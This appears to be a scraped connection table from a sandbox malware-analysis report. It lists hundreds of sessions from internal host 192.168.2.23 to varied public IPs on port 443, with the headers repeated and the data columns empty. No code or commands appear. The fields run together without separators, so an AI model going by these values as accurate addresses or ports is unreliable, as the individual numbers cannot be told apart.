                                                16366192.168.2.2344130154.22.47.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16367192.168.2.2348754104.170.5.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16368192.168.2.2348704167.97.179.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16369192.168.2.2333628213.155.171.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16370192.168.2.235867494.235.116.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16371192.168.2.235967698.136.51.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16372192.168.2.234125841.177.32.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16373192.168.2.2333806166.52.231.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16374192.168.2.235412623.219.160.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16375192.168.2.2355542196.240.28.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16376192.168.2.234257057.19.121.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16377192.168.2.2352386134.134.94.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16378192.168.2.235517646.211.73.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16379192.168.2.23457221.165.212.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16380192.168.2.2335404205.221.34.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16381192.168.2.2349116220.167.248.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16382192.168.2.2339800144.190.211.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16383192.168.2.2353908153.190.70.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16384192.168.2.235110872.198.107.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16385192.168.2.233723087.243.3.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16386192.168.2.235308058.33.139.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16387192.168.2.235091268.117.150.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16388192.168.2.2357006169.158.238.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16389192.168.2.234088823.14.220.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16390192.168.2.23460544.243.149.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16391192.168.2.235269420.118.92.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16392192.168.2.2349478136.63.71.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16393192.168.2.2350618102.143.239.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16394192.168.2.2356986178.142.78.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16395192.168.2.2349868144.36.131.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16396192.168.2.2339516202.99.121.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16397192.168.2.234029859.44.110.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16398192.168.2.23398365.237.75.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16399192.168.2.2332948155.97.250.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16400192.168.2.234938080.169.251.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16401192.168.2.2342454138.215.128.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16402192.168.2.234103625.142.177.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16403192.168.2.2349972176.115.175.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16404192.168.2.2336404136.242.122.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16405192.168.2.233866445.170.99.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16406192.168.2.2344676212.91.35.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16407192.168.2.2341600119.125.147.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16408192.168.2.233719851.182.43.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16409192.168.2.2341354128.217.13.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16410192.168.2.2348178141.83.109.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16411192.168.2.2345996112.18.126.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16412192.168.2.235903837.232.163.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16413192.168.2.235836218.47.175.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16414192.168.2.2360548192.196.19.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16415192.168.2.235802081.49.158.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16416192.168.2.2355090185.10.98.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16417192.168.2.234180891.142.133.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16418192.168.2.2353948121.240.74.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16419192.168.2.2333852107.81.186.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16420192.168.2.234477285.240.220.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16421192.168.2.2350194196.170.35.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16422192.168.2.235932241.139.42.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16423192.168.2.2346902149.44.240.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16424192.168.2.234286482.145.14.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16425192.168.2.2354312195.215.193.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16426192.168.2.235869654.129.98.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16427192.168.2.235186295.156.194.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16428192.168.2.2345080126.186.99.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16429192.168.2.2333648186.178.107.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16430192.168.2.2332906217.113.184.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16431192.168.2.2346198205.163.15.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16432192.168.2.2343406197.228.133.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16433192.168.2.2352916182.84.164.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16434192.168.2.2341174213.36.188.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16435192.168.2.234759468.202.3.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16436192.168.2.235198648.7.53.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16437192.168.2.233695085.178.183.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16438192.168.2.233609232.162.33.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16439192.168.2.2342786198.112.131.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16440192.168.2.2344366171.242.9.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16441192.168.2.2338480149.39.198.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16442192.168.2.23439085.251.1.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16443192.168.2.2343984190.99.97.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16444192.168.2.2341048124.127.210.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16445192.168.2.2339810197.190.166.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16446192.168.2.2335352200.230.230.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16447192.168.2.233695642.35.221.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16448192.168.2.234810413.49.52.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16449192.168.2.2350404116.242.136.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16450192.168.2.234451648.68.186.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16451192.168.2.2339562171.251.195.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16452192.168.2.2341578136.141.89.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16453192.168.2.234536266.244.204.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16454192.168.2.234796049.164.216.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16455192.168.2.2341940196.58.40.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16456192.168.2.2333446153.4.114.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16457192.168.2.2351644154.229.10.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16458192.168.2.2356854104.126.111.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16459192.168.2.2339072134.163.19.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16460192.168.2.2340812146.179.212.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16461192.168.2.2340500174.52.53.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16462192.168.2.2357822211.66.233.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16463192.168.2.2347810128.93.206.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16464192.168.2.2360124109.45.101.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16465192.168.2.2342312185.248.115.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16466192.168.2.234148278.51.22.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16467192.168.2.2357070108.92.44.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16468192.168.2.2360858222.154.190.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16469192.168.2.2351748170.219.113.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16470192.168.2.2349564217.206.241.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16471192.168.2.2356012183.181.247.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16472192.168.2.2344980197.244.210.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16473192.168.2.235045490.210.79.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16474192.168.2.234521662.155.130.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16475192.168.2.2353812116.135.156.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16476192.168.2.2338740190.180.89.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16477192.168.2.235073686.189.118.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16478192.168.2.234059054.95.57.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16479192.168.2.2340268181.167.68.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16480192.168.2.234049070.37.6.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16481192.168.2.2343234161.144.110.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16482192.168.2.2344100197.138.164.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16483192.168.2.233311848.180.160.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16484192.168.2.2345018112.176.23.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16485192.168.2.234390085.93.70.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16486192.168.2.2346666210.118.186.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16487192.168.2.2344768156.228.218.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16488192.168.2.2340066146.23.128.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16489192.168.2.2334514142.145.133.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16490192.168.2.2337196218.11.33.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16491192.168.2.2350984199.80.221.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16492192.168.2.2355542146.249.24.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16493192.168.2.2333252166.231.204.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16494192.168.2.2359166169.177.119.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16495192.168.2.2337568164.224.166.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16496192.168.2.2346750176.15.52.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16497192.168.2.235142661.144.60.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16498192.168.2.234965639.52.149.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16499192.168.2.2356070165.252.186.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16500192.168.2.233475881.84.200.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16501192.168.2.235880494.4.65.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16502192.168.2.2346716128.121.14.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16503192.168.2.2335040176.76.9.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16504192.168.2.235301061.225.164.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16505192.168.2.2353542169.70.25.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16506192.168.2.2334744162.67.98.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16507192.168.2.2346374110.168.177.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16508192.168.2.2336384128.2.37.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16509192.168.2.233797857.223.102.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16510192.168.2.23467909.69.75.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16511192.168.2.2360812165.120.113.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16512192.168.2.235901692.230.119.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16513192.168.2.2338110206.172.71.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16514192.168.2.2333730108.199.45.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16515192.168.2.2349170153.111.190.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16516192.168.2.234684672.194.103.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16517192.168.2.233824824.91.102.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16518192.168.2.2353468105.83.53.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16519192.168.2.2337338125.214.234.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16520192.168.2.2332940120.178.159.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16521192.168.2.235691669.77.161.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16522192.168.2.234512895.8.141.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16523192.168.2.2356216201.177.180.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16524192.168.2.233382497.5.76.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16525192.168.2.234707695.24.168.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16526192.168.2.234622099.134.32.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16527192.168.2.2338754209.109.71.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16528192.168.2.235203036.24.177.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16529192.168.2.2347592181.11.167.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16530192.168.2.233968614.36.157.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16531192.168.2.2338102135.121.151.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16532192.168.2.235448295.101.225.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16533192.168.2.234654844.176.1.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16534192.168.2.233984654.163.233.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16535192.168.2.233636417.189.228.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16536192.168.2.236076869.154.235.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16537192.168.2.2346916204.12.11.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16538192.168.2.2349752181.101.77.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16539192.168.2.234969841.74.46.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16540192.168.2.2344878145.209.182.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16541192.168.2.2351340159.213.131.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16542192.168.2.2360362139.4.56.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16543192.168.2.234248844.56.217.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16544192.168.2.2357382190.31.140.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16545192.168.2.2356098209.198.0.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16546192.168.2.2346450210.56.228.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16547192.168.2.2335188203.131.98.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16548192.168.2.2333702155.240.173.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16549192.168.2.234951062.194.132.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16550192.168.2.233476080.164.195.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16551192.168.2.23415969.51.0.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16552192.168.2.233809487.141.75.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16553192.168.2.236081239.17.88.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16554192.168.2.234513099.216.96.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16555192.168.2.2351932140.36.64.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16556192.168.2.234578884.94.151.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16557192.168.2.2345626162.3.51.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16558192.168.2.234781883.183.168.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16559192.168.2.235825073.100.251.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16560192.168.2.235710850.115.8.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16561192.168.2.2342724115.71.131.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16562192.168.2.2335942107.156.167.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16563192.168.2.235625264.25.71.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16564192.168.2.2358992121.26.226.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16565192.168.2.2337388195.246.85.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16566192.168.2.234027460.114.65.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16567192.168.2.2348852122.232.130.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16568192.168.2.2343118186.96.89.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16569192.168.2.233364457.151.226.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16570192.168.2.234947459.58.30.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16571192.168.2.233611235.28.26.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16572192.168.2.235646877.125.64.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16573192.168.2.234995043.184.136.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16574192.168.2.235644663.127.245.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16575192.168.2.234007674.252.180.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16576192.168.2.233624489.13.125.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16577192.168.2.2358178170.16.22.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16578192.168.2.23396365.122.209.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16579192.168.2.233447244.238.122.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16580192.168.2.234117266.209.147.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16581192.168.2.2345240198.8.78.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16582192.168.2.2342112120.107.102.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16583192.168.2.235461674.229.68.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16584192.168.2.2360988108.200.98.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16585192.168.2.2346586196.12.109.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16586192.168.2.2341018112.134.75.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16587192.168.2.233845497.154.33.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
